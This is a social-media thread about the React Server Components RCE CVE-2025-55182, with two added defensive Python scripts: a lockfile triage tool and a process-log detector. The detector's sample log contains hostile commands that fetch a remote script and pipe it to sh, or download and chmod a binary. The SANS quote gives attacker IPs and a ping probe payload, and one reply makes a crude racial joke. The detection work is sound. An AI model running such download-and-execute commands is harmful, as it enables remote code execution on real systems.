There is an unauthenticated remote code execution vulnerability in React Server Components.

Even if your app does not implement any React Server Function endpoints it may still be vulnerable if your app supports React Server Components.

If your app’s React code does not use a server, your app is not affected by this vulnerability.

CVE-2025-55182

Mastodon server not impacted btw.

https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components
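The advisory text above narrows exposure to React 19 apps that actually ship React Server Components. The following triage script is an added example, not code from the React team or from this thread: it reads an npm lockfile (lockfileVersion 3 layout, which is a real npm format) and reports whether React 19 is installed alongside an RSC runtime or an RSC-capable framework. The RSC runtime package names (react-server-dom-webpack and siblings) and framework names are assumptions I supply from the npm ecosystem, the sample lockfile is constructed, and the versions in it are made up; the verdict "review" means "go read the advisory for the exact fixed versions", not "confirmed vulnerable".

```python
import json
from typing import Dict, List, Tuple

# Constructed sample lockfile in npm's lockfileVersion 3 shape. Versions are
# invented for illustration; the advisory, not this script, gives fixed versions.
SAMPLE_LOCK = json.dumps({
    "name": "example-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "example-app", "version": "1.0.0"},
        "node_modules/react": {"version": "19.0.0"},
        "node_modules/react-dom": {"version": "19.0.0"},
        "node_modules/react-server-dom-webpack": {"version": "19.0.0"},
        "node_modules/next": {"version": "15.1.0"},
        "node_modules/lodash": {"version": "4.17.21"},
    },
})

# Packages whose presence means the app bundles the React Server Components
# runtime. Names assumed from the npm ecosystem, not taken from the thread.
RSC_RUNTIME_PACKAGES = {
    "react-server-dom-webpack",
    "react-server-dom-turbopack",
    "react-server-dom-parcel",
}
# Frameworks the thread mentions as carrying RSC support (assumed package names).
RSC_FRAMEWORKS = {"next", "react-router"}


def package_name(lock_path: str) -> str:
    """'node_modules/a/node_modules/@scope/b' -> '@scope/b' (innermost package)."""
    return lock_path.split("node_modules/")[-1]


def load_versions(lock_json: str) -> Dict[str, List[str]]:
    """Map package name -> every installed version, nested duplicates included."""
    data = json.loads(lock_json)
    versions: Dict[str, List[str]] = {}
    for path, meta in data.get("packages", {}).items():
        if not path:  # the root project entry has an empty key
            continue
        versions.setdefault(package_name(path), []).append(meta.get("version", "?"))
    return versions


def major(version: str) -> int:
    try:
        return int(version.split(".")[0])
    except ValueError:
        return -1


def triage(lock_json: str) -> Tuple[str, List[str]]:
    """Return (verdict, reasons).

    'not-affected'    -> no React 19 in the tree
    'no-rsc-runtime'  -> React 19 present but no RSC runtime/framework found
    'review'          -> React 19 plus RSC runtime or framework: check the advisory
    """
    versions = load_versions(lock_json)
    react_versions = versions.get("react", [])
    if not any(major(v) == 19 for v in react_versions):
        return "not-affected", [f"react versions present: {react_versions or 'none'}"]
    reasons = [f"react 19 present: {react_versions}"]
    rsc_hits = sorted(RSC_RUNTIME_PACKAGES & versions.keys())
    fw_hits = sorted(RSC_FRAMEWORKS & versions.keys())
    for name in rsc_hits + fw_hits:
        reasons.append(f"{name} {versions[name]}")
    if rsc_hits or fw_hits:
        return "review", reasons
    return "no-rsc-runtime", reasons


if __name__ == "__main__":
    verdict, reasons = triage(SAMPLE_LOCK)
    print(verdict)
    for r in reasons:
        print("  -", r)
```

Run it against a real `package-lock.json` by reading the file into `triage()`; nested copies of `react` are listed too, because a pinned older copy under a sub-dependency is exactly the case the SANS post warns about.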


Vulnerability hype train derail time - these vulns only apply to React 19 (released within the past year) and only when using a specific new feature, React Server.

The React vulns have the usual panicked nonsense going on - people posting fake PoCs (all of them are fake), people spraying fake PoCs over the whole internet, people posting screenshots of fake PoC activity thinking it's real, doomsday scenario posts etc etc.

It’s actually a niche scenario bug for the vast majority of orgs, just stay calm and patch if you are actually impacted (spoiler: you probably aren’t).

We have our first victim of overreacting to the React vuln - the Cloudflare global outage was them taking down their own service while trying to spot an actually very niche vuln.
New by me - cybersecurity industry overreacts to React vulnerabilities, sets itself on fire https://doublepulsar.com/cybersecurity-industry-overreacts-to-react-vulnerability-starts-panic-burns-own-house-down-again-e85c10ad1607

Really interesting thing happening with the React vuln where lots of the cyber companies reporting exploitation don't appear to realise they're reporting on exploit attempts for GitHub PoCs which aren't actually real - said PoCs just set up a vuln webapp in a way nobody would in real world.

It's not all the attempts but it's a large portion.

Me:

Similarly, attackers are spraying the internet with PoCs where I don't think they realise they don't actually work, largely. Cybersecurity is great, I love it.

I keep seeing all the vendor write-ups about botnets using that React vuln... but I’m not sure the vendors understand that botnets integrating something does not equal success.

The whole thing has been pretty eye opening.

@GossiTheDog from what I've seen (from friends in DFIR and random posts in r/nextjs) it was fairly successfully exploited, but usually at least one attacker would drop a cryptominer or something dumb like that, so the breach would quickly get detected.

I don't think it's quite like "spring4shell" and similar vulns that got integrated into botnets but basically never pwned anyone.

@GossiTheDog we’ve been seeing some DDoS attacks from React bots (likely rondodox, but haven’t really bothered confirming) — pretty small scale, all things considered.

@GossiTheDog vendors get marketing opportunities and are happy, attackers get to feel cool playing with new toys and are happy, no one gets hacked, it's a win/win/win
SANS Internet Storm Center - SANS.edu - Go Sentinels!

No surprise: We do see active hits of the React Vulnerability (CVE-2025-55182) against our honeypots. The initial exploit attempts we are seeing originate from the following two IP addresses: 193.142.147.209 and 95.214.52.170. The payloads are either "ping -c 1 45.157.233.80" or "console.log('CVE-2025-55182-VULN')". If you find an unpatched React app in your environment, you should assume that it has been compromised at this point. Also be careful with apps that may have pinned older versions of React/Next.js.

@GossiTheDog One does not simply overreact over react

@GossiTheDog

Perhaps this needs to be called the OVER REACT bug? 😉

Still, an alleged 10.0 is quite an achievement.

PoC via @maple3142

https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3

CVE-2025-55182.http

@GossiTheDog Apparently there's a whole load of AI-generated bunkum PoCs.

@GossiTheDog The bit I think you might be missing is that Next.js has been vulnerable in every 15.x and 16.x release since January 2025 until last week.

11 months is not "new" in the JS world. In fact, I'd imagine in the age of dependabot et al. more Next.js sites would have been vulnerable to this when the vuln dropped than not.

Yes, React Server Components might be niche. But Next.js absolutely is not.

@GossiTheDog Well, they sell WAF-as-a-Product, so introducing observability to identify CVE-2025-55182 payloads seems a legitimate choice. I don't think it is overreacting in this case.

@GossiTheDog interestingly, at least in my bubble you are the only one placating the React vuln as out of proportion. I have no shares in this issue so I'm in a luxury position to not really care, but everybody else and their mothers are running around like scared chickens :D

@GossiTheDog often just compliance, „we run zero (high rated) CVE infra“, so the security theater has to do something.

@GossiTheDog It's all the more hilarious because "uploading a bad WAF configuration change" is so far the leading cause of global CDN outages. That was The Big One in 2019 and they had a detailed writeup on how this isn't going to happen again. And in the meantime CrowdStrike gave us a refresher on what global bad configuration deployments look like.

And then Cloudflare came and did it again. Ooops.

(At least this time it only took them 20 mins to find the rollback button. Progress, I guess.)

@GossiTheDog so glad they rushed to fix that and not their inability to do canary rollouts or manual testing on anything smaller than all of global prod

@GossiTheDog "an actually very niche" 10.0 tho

@GossiTheDog There isn't; but there probably should be a level of engineering professionalism and change control where "an actor working within the scope of his authorization broke the system" is more damning than "an attacker broke the system" rather than less.

@GossiTheDog Yeah, that caused a few hiccups for us as well!

@GossiTheDog

Remember, remember
The Fourth of December
The JavaScript vuln in React
I know of Node reason
This CVE season
The Next patch should be taken back.

@GossiTheDog hmmm, normally Maurice doesn’t post BS

@SirBeringer @GossiTheDog tbh Maurice said the attempts were using the “fake” POCs.

@GossiTheDog

Just so you know, everything you wrote in the first paragraph about fake PoCs (proof of concepts) is also true about fake PoCs (people of color).

@GossiTheDog and only if you self-host something using RSC, which I suspect most people are not doing. NextJS is famous for only really working on Vercel

@gnuplusknoppers @GossiTheDog Vercel…..doesn't have the best security practices. Don't ask me how I know.

@GossiTheDog Aww... I mean, that's good news!
@GossiTheDog With this many sightings (mostly from Bluesky), there is surely at least a bit of hype: https://vulnerability.circl.lu/vuln/CVE-2025-55182#sightings

@GossiTheDog I had to double-check our FE at work just to be sure we're not using the affected components. Luckily, while React Router (formerly Remix) is affected by this, it is only affected if experimental support for React Server Components is enabled.

Meanwhile, this does nothing to lessen the general levels of ire I have for the entire JavaScript and friends ecosystem.

@GossiTheDog Ooh, I love it when you do that!

@GossiTheDog thanks for the fyi, wish there weren't so many things called "react-router" (looking at you @tanstack/react-router) to confuse matters

@GossiTheDog

Potential exploitation being seen itw, no surprise the miners may be first past the post.

@GossiTheDog

Regular/rudimentary detections may pick up post-ex in this case. Look for file downloads from hardcoded domains (generally sus outside of some special cases) using your fav wget/curl etc.
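The post-ex hunting idea above (a web app process spawning wget/curl against a hardcoded host) and the honeypot payloads quoted in the SANS post (a one-shot `ping -c 1` and the `CVE-2025-55182-VULN` marker) can be turned into a small detection pass over process-start telemetry. The script below is an added example, not code from anyone in this thread. It assumes a flattened `ts parent=<name> exe=<name> cmd="<argv>"` log format, assumes the app server runs as a process named `node`/`next-server`/`npm`, and uses constructed sample lines with documentation IP ranges and an `.example.test` host; the allow-list is a placeholder to tune per environment.

```python
import re
from dataclasses import dataclass
from typing import List, Optional
from urllib.parse import urlparse

# Constructed sample process-start log (not real telemetry). Assumed format:
#   <ts> parent=<parent process> exe=<child process> cmd="<full command line>"
SAMPLE_LOG = """\
2025-12-05T10:01:02Z parent=node exe=sh cmd="sh -c curl -s http://203.0.113.10/x.sh | sh"
2025-12-05T10:01:03Z parent=node exe=sh cmd="sh -c wget -q -O /tmp/m http://dl.example.test/m && chmod +x /tmp/m"
2025-12-05T10:01:04Z parent=node exe=sh cmd="sh -c ping -c 1 203.0.113.20"
2025-12-05T10:01:05Z parent=node exe=node cmd="node -e console.log('CVE-2025-55182-VULN')"
2025-12-05T10:02:00Z parent=systemd exe=curl cmd="curl -fsSL https://registry.npmjs.org/react -o /tmp/r.json"
2025-12-05T10:02:01Z parent=node exe=sh cmd="sh -c ls -la /var/app"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\S+) parent=(?P<parent>\S+) exe=(?P<exe>\S+) cmd="(?P<cmd>.*)"$'
)
URL_RE = re.compile(r"https?://[^\s'\"|;&]+")
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
DOWNLOADERS = ("curl", "wget")
# Assumed names for the React/Next app server process; adjust to your deployment.
WEB_SERVER_PARENTS = {"node", "next-server", "npm"}
# Placeholder allow-list of hosts the app server legitimately fetches from.
ALLOWED_HOSTS = {"registry.npmjs.org"}


@dataclass
class Finding:
    ts: str
    severity: str
    reason: str
    cmd: str


def downloader_in(cmd: str) -> bool:
    return any(re.search(rf"\b{d}\b", cmd) for d in DOWNLOADERS)


def analyze_line(line: str) -> Optional[Finding]:
    """Return a Finding for a suspicious process start, or None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, parent, cmd = m["ts"], m["parent"], m["cmd"]
    from_web_server = parent in WEB_SERVER_PARENTS

    # Marker string the honeypot payloads used, as quoted in the thread.
    if "CVE-2025-55182-VULN" in cmd:
        return Finding(ts, "high", "exploit-check marker in command line", cmd)

    # Outbound download launched by a shell the app server spawned.
    if from_web_server and downloader_in(cmd):
        piped = bool(re.search(r"\|\s*(sh|bash)\b", cmd))
        for url in URL_RE.findall(cmd):
            host = urlparse(url).hostname or ""
            if host in ALLOWED_HOSTS:
                continue
            if IPV4_RE.match(host) or piped:
                suffix = " piped to shell" if piped else ""
                return Finding(ts, "high", f"download from hardcoded host {host}{suffix}", cmd)
            return Finding(ts, "medium", f"download from hardcoded host {host}", cmd)
        return Finding(ts, "medium", "downloader spawned by app server (no URL parsed)", cmd)

    # Single ping from the app server: the blind execution check seen on honeypots.
    if from_web_server and re.search(r"\bping\b.*-c\s*1\b", cmd):
        return Finding(ts, "medium", "one-shot ping from app server (execution check)", cmd)
    return None


def scan(log_text: str) -> List[Finding]:
    return [f for f in (analyze_line(l) for l in log_text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.ts} [{f.severity}] {f.reason}: {f.cmd}")
```

The parent-process condition does most of the work: `curl` from a package manager or CI job is routine, while a shell child of the app server fetching from a literal IP and piping to `sh` is the pattern worth paging on. The harmless `ls` line and the systemd-parented npm fetch fall through to `None`.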